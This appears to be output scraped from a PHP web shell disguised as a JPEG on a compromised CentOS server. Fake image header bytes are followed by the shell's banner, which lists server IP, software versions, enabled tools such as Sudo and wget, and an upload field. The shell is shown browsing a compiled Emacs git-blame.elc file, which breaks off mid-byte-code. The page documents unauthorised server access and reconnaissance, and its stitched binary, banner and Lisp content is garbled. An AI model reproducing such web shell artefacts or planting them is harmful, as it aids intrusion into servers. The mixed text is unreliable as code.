ÿØÿà�JFIF������ÿápExif��II*������[������¼
| Server IP : 104.21.87.198 / Your IP : 104.23.175.122 Web Server : Apache/2.2.15 (CentOS) System : Linux GA 2.6.32-431.1.2.0.1.el6.x86_64 #1 SMP Fri Dec 13 13:06:13 UTC 2013 x86_64 User : apache ( 48) PHP Version : 5.6.38 Disable Function : NONE MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : OFF Directory : /usr/share/doc/git-1.7.1/contrib/emacs/ |
Upload File : |
;ELC
;;; Compiled by mockbuild@c1bl.rdu2.centos.org on Wed Aug 16 23:59:56 2017
;;; from file /builddir/build/BUILD/git-1.7.1/contrib/emacs/git-blame.el
;;; in Emacs version 23.1.1
;;; with all optimizations.
;;; This file uses dynamic docstrings, first added in Emacs 19.29.
(if (and (boundp 'emacs-version)
(< (aref emacs-version (1- (length emacs-version))) ?A)
(or (and (boundp 'epoch::version) epoch::version)
(string-lessp emacs-version "19.29")))
(error "`git-blame.el' was compiled for Emacs 19.29 or later"))
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
(byte-code "\300\301\302\303\304\305%\210\306\305\307\310\304\311\312\313&\207" [custom-declare-face git-blame-prefix-face ((((background dark)) (:foreground "gray" :background "black")) (((background light)) (:foreground "gray" :background "white")) (t (:weight bold))) "The face used for the hash prefix." :group git-blame custom-declare-group nil "A minor mode showing Git blame information." git :link (function-link git-blame-mode)] 8)
#@53 Use colors to indicate commits in `git-blame-mode'.
(custom-declare-variable 'git-blame-use-colors 't '(#$ . 1055) :type 'boolean :group 'git-blame)
#@313 The format of the prefix added to each line in `git-blame'
mode. The format is passed to `format-spec' with the following format keys:
%h - the abbreviated hash
%H - the full hash
%a - the author name
%A - the author email
%c - the committer name
%C - the committer email
%s - the commit summary
(custom-declare-variable 'git-blame-prefix-format '"%h %20A:" '(#$ . 1211) :group 'git-blame)
#@336 The format of the description shown when pointing at a line in
`git-blame' mode. The format string is passed to `format-spec'
with the following format keys:
%h - the abbreviated hash
%H - the full hash
%a - the author name
%A - the author email
%c - the committer name
%C - the committer email
%s - the commit summary
(custom-declare-variable 'git-blame-mouseover-format '"%h %a %A: %s" '(#$ . 1624) :group 'git-blame)
#@120 Given a list, returns a list of triples formed with each
elements of the list.
a b => bbb bba bab baa abb aba aaa aab
(defalias 'git-blame-color-scale #[(&rest elements) "\306 \306\211\203J @ \306\211\203B
@ \306 \211\n\203: \n@ \307\310\n\f $B\nA\211\n\204\"